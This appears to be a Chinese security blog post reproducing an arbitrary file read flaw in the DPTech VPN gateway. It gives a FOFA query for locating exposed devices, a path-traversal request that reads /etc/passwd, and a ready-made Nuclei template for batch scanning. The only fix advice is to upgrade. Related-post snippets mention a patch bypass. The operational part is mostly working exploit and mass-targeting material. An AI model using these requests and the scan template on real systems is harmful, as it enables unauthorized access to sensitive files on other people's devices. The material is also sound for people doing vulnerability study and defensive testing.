漏洞复现--迪普DPTech VPN 任意文件读取

最新推荐文章于 2024-10-22 20:30:52 发布
最新推荐文章于 2024-10-22 20:30:52 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134420311
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。

二:漏洞影响版本

DPTech VPN

三:网络空间测绘查询

fofa:
cert="DPtechCa"
image.png

四:漏洞复现

image.png
POC:

GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

image.png
image.png

五:批量检测


id: dptech-vpn-fileread

info:
  name: dp-vpn-fileread
  author: rain
  severity: high
  description: DPtech SSL VPN 服务存在一个文件读取漏洞,攻击者可以通过利用此漏洞读取目标系统上的敏感文件。该漏洞可能导致未经授权的信息泄露,危及系统的机密性和完整性。
  metadata: 
    fofa-query: title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"

http:
  - raw:
      - |     
        GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"root")'

image.png

六:修复建议

升级到最新版本

漏洞复现DPTech VPN存在任意文件读取漏洞
失心少年
11-22 944
DPtech VPN智能安全网关是迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
DPtech SSL VPN Service任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-01 927
杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。这可能包括配置文件、敏感文档或其他敏感信息。成功利用此漏洞的攻击者可以获取系统敏感数据,可能导致横向扩展攻击、身份盗窃等风险。
迪普-SSL-VPN-任意文件读取
weixin_43567873的博客
03-09 753
迪普-SSL-VPN-任意文件读取
迪普SSL VPN 任意文件读取漏洞复现(补丁绕过)
0xSec
09-10 1105
迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现迪普-SSL-VPN-任意文件读取
知黑而守白
01-18 618
DPtech VPN迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问;支持基于用户、应用的安全策略,同时提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口;除此以外,实现了集中管理、统一配置,并集成AC和PoE功能,支持3G/4G无线模块扩展,可有效的简化用户组网,降低运维成本。
迪普DPTech VPN 任意文件读取 CNVD-2023-69478
最新发布
B1ackW4ter的博客
10-22 384
迪普DPTech VPN是杭州迪普科技股份有限公司面向广域互联应用场景推出的专业安全网关产品DPTech VPN集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,为分支机构、移动办公人员提供统一的安全接入,实现内部业务跨互联网的安全访问。同时,它支持基于用户、应用的安全策略,并提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口。
某普SSLVPN 任意文件读取
iSee857的博客
10-12 1129
‌ 该产品支持基于用户、应用的安全策略,提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口。迪普VPN还实现了集中管理、统一配置,集成。迪普SSLVPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件。功能,支持3G/4G无线模块扩展,有效简化用户组网,降低运维成本‌。增加ip白名单,限制非白名单中ip访问。
Array-VPN任意文件读取
hobbo__的博客
08-15 1245
【代码】Array-VPN任意文件读取
规范渗透测试报告中的漏洞名称以及修复建议
xiaokp7的博客
08-19 439
越权漏洞是比较常见的漏洞类型,越权漏洞可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽,对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。攻击者可以利用弱口令直接登录SSH服务器,读取甚至修改网站代码,或者导致服务器沦陷。通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者检验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
WuThreat身份安全-TVD每日漏洞情报-2023-10-07
wuthreat无胁科技的博客
10-08 419
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-33268。漏洞编号:CVE-2023-32485。
迪普防火墙DPtech FW1000系列应用防火墙用户手册v2.4.pdf
10-31
迪普防火墙DPtech FW1000系列应用防火墙用户手册v2.4.pdf
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 2万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
迪普防火墙命令行手册_Web应用程序防火墙(WAF)bypass技术讨论(一)
weixin_39846378的博客
12-13 7929
Web应用程序中发现RCE漏洞的情况还是挺常见的,2017 OWASP Top 10应用程序安全风险”也将“注入”置于第一位置,例如当解释器接收到用户可控的数据作为命令或查询来执行时,很有可能会导致注入风险,例如SQL,NoSQL,OS和LDAP注入。攻击者的恶意数据可以欺骗解释器在没有授权的情况下执行非预期的命令或访问敏感数据。所有现代Web应用程序防火墙都能够拦截(甚至阻止)RCE,...
Goby内测版1.7.192 | 攻防实战Buff版
m0_46699477的博客
09-01 3199
上个攻防版发布后,表哥/表姐陆续反馈了一些在实际场景遇到问题,如深信服等VPN网卡无法识别、启动报错、扫描进程卡84%等等…对此,我们深表歉意,所以本次更新将重点解决无法扫描、漏洞误报及漏报等问题,并加强资产收集和漏洞利用模块。目标只有一个:拿分!拿分!!拿分!!!还是特么的拿分!!!! 文章看到底,找此版本的获取方式↓ 0x001 新增功能及优化 1. 新增插件 子域名爆破:子域名爆破往往是渗透测试的第一步,通过收集更多的子域名,获得更全面的资产信息,进而有助于对主站的渗透测试。这是众所周知的事情,表
网络安全设备常见弱口令
1stPeak's Blog
08-12 5369
网上总结一下网络安全设备常见默认口令,方便后续自己查看 安全设备 默认用户名 默认密码 深信服 sangfor sangforsangfor@2018sangfor@2019 深信服科技 AD dlanrecover 深信服负载均衡 AD 3.6 admin admin 深信服WAC ( WNS V2.6) admin admin 深信服VPN Admin Admin 深信服ipsec-VPN (SSL 5.5) Admin Admin 深信服A
ssl加速网关_迪普科技行业实践:国密SSL加速方案助力业务安全、高效交付
weixin_39770311的博客
01-09 559
热点追踪中国人民银行在2020年02月05日发布《网上银行系统信息安全通用规范》(JR/T 0068-2020)要求:“网上银行系统在使用密码算法时应符合国家密码主管部门的要求,在支付敏感信息加密及传输、数字证书签名及验签等环节宜支持并优先使用SM系列密码算法。”由于电子银行开放性的特点,在面对交易等其他敏感类业务时,如果数据不进行加密而直接进行传输,还存在很大的信息泄露风险,常通过SS...
任意文件读取下载漏洞
u011215939的博客
12-19 1万+
任意文件读取下载漏洞漏洞原理
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
谢公子的博客
07-24 5815
CVE-2020-3452 漏洞描述 思科官方链接:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 参考文章:https://mp.weixin.qq.com/s/zm0NXfBQLbqU0kZ9Uk7qLQ
迪普漏洞扫描系统产品线
weixin_34351321的博客
11-20 393
迪普漏洞扫描系统产品线 转载于:https://blog.51cto.com/itcn001/1064602
DPtech ADX3000-GC应用交互交换网关安装指南
DPtech ADX3000-GC是一款由杭州迪普科技有限公司提供的高性能网络设备,主要用于实现应用级别的交互和数据交换。 **第1章 产品介绍** 1.1 产品概述 DPtech ADX3000-GC是一款专为网络流量管理和优化设计的应用交互...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值